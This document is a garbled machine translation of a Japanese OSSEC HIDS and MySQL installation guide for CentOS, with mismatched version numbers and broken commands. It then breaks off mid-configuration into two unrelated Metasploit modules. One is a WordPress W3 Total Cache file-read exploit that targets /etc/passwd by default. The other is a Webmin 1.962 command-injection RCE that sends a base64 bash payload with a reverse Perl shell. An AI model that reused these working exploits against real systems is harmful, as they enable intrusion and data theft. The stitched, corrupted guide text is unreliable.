5。Yumソースアップデートコマンドを実行します
[root@localhost]#
ヤムはすべてをきれいにします
[root@localhost]#
Yum Makecache
[root@localhost]#
YUMアップデート
ファイアウォールを閉じます
[root@localhost
〜]#cat/etc/selinux/config
#
このファイルは、システム上のSELINUXの状態を制御します。
#
Selinux=これら3つの値のいずれかを取得できます3:
#施行-Selinuxセキュリティポリシーはです
強制。
#許容- Selinuxが警告を印刷します
強制する代わりに。
#無効-Selinuxポリシーはロードされていません。
selinux=disabled
#
selinuxType=3つの値のうち3つのうち:のいずれかを取得できます
#ターゲット - ターゲットプロセスはです
保護された、
#最小- ターゲットポリシーの変更。
選択されたプロセスのみが保護されています。
#MLS-マルチレベルのセキュリティ保護。
selinuxType=ターゲット
閉じるファイアウォール:
Systemctl stop firewalld.service #stop firewall
SystemCtl Disabled firewalld.service #disable firewallブート
mysqlのインストールと構成
1。MySQLのYumソースのRPMパッケージをダウンロード
[root@localhost]
〜]#
wgethttp://Repo.mysql.com/mysql57-community-release-el7.rpm
2。rpmファイルをインストールし、コマンドを介してmysqlのyumソースをインストールします。
[root@localhost]
〜]#rpm -ivh mysql57-community-release-el7.rpm
3。YumはMySQLとLIBプラグインをインストールします
[root@localhost]
〜]#yum install -y mysql -server
[root@localhost]
〜]#yum -yマリアドブサーバーmariadb mariadb-develをインストールします
4。MySQLを開始します
[root@localhost]
〜] #SystemCtl MySQLDを開始します
5。スタートアップのセットアップ:
[root@localhost]
〜] #systemctlを有効にしますmysqld
6. mysqlの一時的なパスワード情報を取得します
[root@localhost]
〜] #grep '一時的なパスワード' /var/log/mysqld.log
7。 MySQLパスワードポリシーを設定します
[root@localhost]
〜] #mysql -uroot –P
mysql
Global validate_password_policy=0を設定します。
mysqlset
Global Validate_password_length=1;
8。ルートアカウントがログインできるように設定します
mysql
「roothost」で識別されたユーザー「ルート」@'localhost'を変更します。
7.他のマシンにログインすることを許可します
8. mysqlにユーザーoseecを追加して、挿入、追加、削除などのアクセス許可があります。
mysql
-uroot -P
MySQLはデータベースOSSECを作成します。
mysql grant insert、select、update、create、削除、ossec。* to
ossec@localhost 'ossec'によって識別されました。
MySQLフラッシュ特権。
mysql \ q
9.データベースを作成して、以下のインストール構成を容易にし、マシンのmysqに接続します
[root@localhost]
〜] #mysql -uroot -P
mysql
データベースOSSECを作成します。
管理ライブラリとセドメールとPHPソフトウェアのインストール
1.最初に、使用する必要がある関連するライブラリとソフトウェアをインストールします。最終的に分析のためにログをMySQLにインポートする必要があり、Webプログラムを通じてアラーム結果を表示する必要があるため、ローカルマシンをSMTPとして扱う必要があるため、MySQL、Apache、Sendmailサービスをローカルマシンにインストールする必要があります。現在の端末で次のコマンドを実行します
[root@localhost]
〜]#yum install wget gcc make httpd php php-mysql sendmail
2。HTTPDサービスを開始してステータスを表示し、ランダム開始を設定します
[root@localhost]
〜] #SystemCtl Start HTTPD #Start HTTPDサービス
[root@localhost]
〜] #SystemCtlステータスhttpd.Service #View HTTPDサーバー
[root@localhost]
〜] #systemctl enable httpd #set起動
3. sendmailサービスを開始してステータスを表示し、ランダムスタートを設定します
[root@localhost]
〜] #SystemCtl Start sendmail.service #set Sedmailを開始します
[root@localhost]
〜] #SystemCTLステータスSENDMAIL.SERVICE #View SedMail Status
[root@localhost]
〜] #SystemCtl enable sendmail.service #set startup
OSSECサーバー側のインストールと構成
1。WGETからOSSECインストールパッケージをダウンロードします
[root@localhost]
〜]#
wget https://bintray.com/artifact/download/ossec/ossec-hids/ossec-hids-2.8.3.tar.gz
2。OSSECインストールディレクトリを入力します
[root@localhost〜] #cd ossec-hids-2.9.3/
3。OSSECをサポートするには、次のように、インストール前にmake setDBコマンドを実行する必要があります
[root@localhost]
〜] #CD SRC
[root@localhost]
〜] #setdbを作成します
MySQLが正常にサポートできることを示すために、次の情報を見ました。
info:
MySQLサポートが編集されています。
4. OSSECサーバーをインストールします
[root@localhost]
Ossec-hids-2.8.3]#./install.sh
which:ホストはありません(/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/sbin:/us r/bin:/root/bin:/usr/local/mysql/bin:/usr/local/jdk1.7.09 //bin:/root/bin)
** ParaInstalaçãoEmPortuguês、Escolha
[BR]。
**中国語にインストールするには、[CN]を選択します。
** fur eine deutscheのインストールwohlen sie [de]。
**γιαεγκατλτασησταελληνικ最初、επιλέξτε
[EL]。
**英語にインストールするには、[en]を選択します。
**パラInstalar enespañol、eliga [es]。
** uneのインストールをfrançais、
choissez [fr]
** MagyarNyelvűTelepítéshezVálassza
[hu]。
**イタリアーノのl'intectazioneあたり、Scegli
[それ]。
**日本語《インストールします.以下を選択してください。 [JP]。
**ヘットネダーランドのキーズのvoor installatie
[NL]。
** AbyInstalowaćWJęzykuPolskim、Wybierz
[PL]。
**дляинстрокцпо陶器するげするげすると
、ведите[ru]。
** za instalaciju na srpskom、izaberi [sr]。
**TürkçeKurulumIçinSeçin[Tr]。
(en/br/cn/de/el/es/fr/hu/it/jp/nl/pl/ru/sr/tr)[en] : cn
which:ホストはありません
(/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/sbin:/us r/bin:/root/bin:/usr/local/mysql/bin:/usr/local/jdk1.7.09 //bin:/root/bin)
Ossec Hids v2.7.1インストールスクリプト-http://www.ossec.net
OSSEC HIDSのインストールを開始します。
Cコンパイラがマシンに正しく取り付けられていることを確認してください。
ご質問や提案がある場合は、dcid@ossec.net(またはdaniel.cid@gmail.com)にメールしてください。
- システムタイプ: Linux ossec-server.com 2.6.32-431.el6.x86_64
- ユーザー:ルート
-Host : ossec-server.com
- Enterを押して続行するか、CTRL-Cを終了して終了します。
-
1-どのインストール(サーバー、エージェント、ローカル、またはヘルプ)が必要ですか?
サーバ
- サーバータイプのインストールが選択されました。
2-インストール環境の初期化。
-OssecHids [/usr/local/ossec] :/usr/local/ossecのインストールパスを選択してください
-OSSECHIDSは/USR/Local/OSSECにインストールされます。
3- OSSEC HIDSの構成。
3.1-電子メールアラートを受け取りたいですか? (y/n)[y] : y
- 電子メールアドレスを入力してください。 root@backlion.org
-SMTPサーバーIPまたはホスト名を入力してください。 127.0.0.1
3.2-システムの整合性検出モジュールを実行しますか? (y/n)[y] : y
- システム整合性検出モジュールが展開されます。
3.3- rootkit検出を実行しますか? (y/n)[y] : y
-RootKit検出が展開されます。
3.4-関連する応答を使用すると、aを実行できます
定義されたコマンド。
たとえば、特定のIPアドレスへのアクセスをブロックしたり、特定のユーザーへのアクセスを無効にしたりできます。
詳細については、をご覧ください
http://www.ossec.net/en/manual.html#active-response
- アクティブな応答関数を有効にしますか? (y/n)[y] : y
-Association Responseが有効になります
- デフォルトでは、ホストの拒否とファイアウォールの両方の拒否の両方を有効にします。
最初のケースでは、/etc /hosts.denyにホストを追加します。
2番目のケースは、iPtables(Linux)またはIPFilter(Solaris、
ホストへのアクセスは、FreeBSDまたはNetBSDで拒否されます。
- この機能は、SSHDブルートフォース攻撃、ポートスキャンなどをブロックするために使用できます
いくつかの形式の攻撃。他の場所に追加することもできます。
たとえば、それらを鼻のイベントとして追加します。
- ファイアウォールドロップ機能を有効にしますか? (y/n)[y] : y
- イベントレベル=6のときにファイアウォールドロップが開始されます
- リンケージ関数のデフォルトのホワイトリストは:です
-
172.16.91.130 #ossecサーバーIP
- ホワイトリストにIPSを追加しますか? (Y/N)? [n] : n
3.5-リモートマシンSyslog(ポート514 UDP)を受け取りたいですか? (y/n)[y] : y
- リモートマシンSyslogが受信されます。
3.6-ログ:を分析するには、構成ファイルを設定します
- /var/log/メッセージ
- /var/log/secure
- /var/log/maillog
- 他のファイルを監視する場合は、構成ファイルossec.confにある必要があります
新しいアイテムを追加します。
構成に関する質問はhttp://www.ossec.netにあります。
5。サーバーを構成して正常に動作させるために、次のコマンドを実行してデータベースサポートを有効にします
[root@localhost]
Ossec-Hids-2.8.3]#/var/ossec/bin/ossec-control enableデータベース
6. mysqlテーブル構造をmysqlにインポートします
[root@localhost]
ossec-hids-2.8.3]#
mysql
-uossec -p ossec src/os_dbd/mysql.schema
7.構成ファイルの権限を変更すると、サービスが開始されます。
[root@localhost]
など]#chmod u+w/var/ossec/etc/ossec.conf
8。OSSEC.CONFファイルを編集し、OSSEC_CONFIGでMySQL構成を追加します
database_output
hostnameLocalhost/hostname
usernameossec/username
PasswordDossec/パスワード
Databaseossec/データベース
typemysql/type
/database_output
9.リモートマシンをサポートするサーバーインストールプロセス中にSyslogが設定されるため、ossec.confファイルのsyslogパーツを構成する必要があり、ossec.confファイルを変更する必要があり、収集する必要があるすべてのネットワークセグメントが追加されます。
リモート
connectionsyslog/connect
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in WordPress plugin
'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
the web server privileges.
},
'References' =>
[
['CVE', '2019-6715'],
['WPVDB', '9248'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
],
'Author' =>
[
'VinhJAXT', # Vulnerability discovery
'Hoa Nguyen - SunCSR Team' # Metasploit module
],
'DisclosureDate' => '2014-09-20',
'License' => MSF_LICENSE
)
)
register_options(
[
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
]
)
end
def check
check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
end
def run_host(ip)
traversal = '../' * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ %r{^/}
json_body = { 'Type' => "SubscriptionConfirmation",
'Message' => '',
'SubscribeURL' => "file:///#{traversal}#{filename}"
}
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)
})
fail_with Failure::Unreachable, 'Connection failed' unless res
fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
print_status('Downloading file...')
print_line("\n#{res.body}\n")
fname = datastore['FILEPATH']
path = store_loot(
'w3_total_cache.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.962 and lower versions. Any user authorized to the "Package Updates"
module can execute arbitrary commands with root privileges.
It emerged by circumventing the measure taken for CVE-2019-12840.
s/\\(-)|\\(.)/string/g; escape is not enough for prevention.
Therefore, since the package name variable is placed directly in the system command,
we can manipulate it using some escape characters that HTTP supports.
For example, we can escape control by dropping the command line down one line.
We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly,
we must add double an ampersand(&&) to the end of the payload (%26%26)
),
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', 'CVE-2020-35606'],
['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultOptions' =>
{
'RPORT' => 10000,
'SSL' => false,
'PAYLOAD' => 'cmd/unix/reverse_perl'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [['Webmin <= 1.962', {}]],
'DisclosureDate' => '2020-12-21',
'DefaultTarget' => 0)
)
register_options [
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
]
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
'cookie' => 'testing=1', # it must be used for "Error - No cookies"
'vars_post' => {
'page' => '',
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD']
}
})
if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
return $1
end
return nil unless res
''
end
def check
cookie = login
return CheckCode::Detected if cookie == ''
return CheckCode::Unknown if cookie.nil?
vprint_status('Attempting to execute...')
# check version
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"),
'cookie' => "sid=#{cookie}",
'vars_get' => { "xnavigation" => "1" }
})
if res && res.code == 302 && res.body
version = res.body.split("Webmin 1.")[1]
return CheckCode::Detected if version.nil?
version = version.split(" ")[0]
if version <= "962"
# check package update priv
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "package-updates/"),
'cookie' => "sid=#{cookie}"
})
if res && res.code == 200 && res.body =~ /Software Package Update/
print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
return CheckCode::Vulnerable
end
end
end
print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
print_status("Please try with another user account!")
CheckCode::Safe
end
def exploit
cookie = login
if cookie == '' || cookie.nil?
fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
end
print_good("Session cookie: #{cookie}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
'cookie' => "sid=#{cookie}"
)
unless res && res.code == 200
fail_with(Failure::Unknown, 'Request failed')
end
print_status("Attempting to execute the payload...")
run_update(cookie)
end
def run_update(cookie)
@b64p = Rex::Text.encode_base64(payload.encoded)
perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
payload = Rex::Text.uri_encode(perl_payload)
res = send_request_cgi(
{
'method' => 'POST',
'cookie' => "sid=#{cookie}",
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
'headers' =>
{
'Referer' => "#{peer}/package-updates/?xnavigation=1"
},
# new vector // bypass to backslash %0A%7C{}%26%26
'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26"
# for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
})
end
end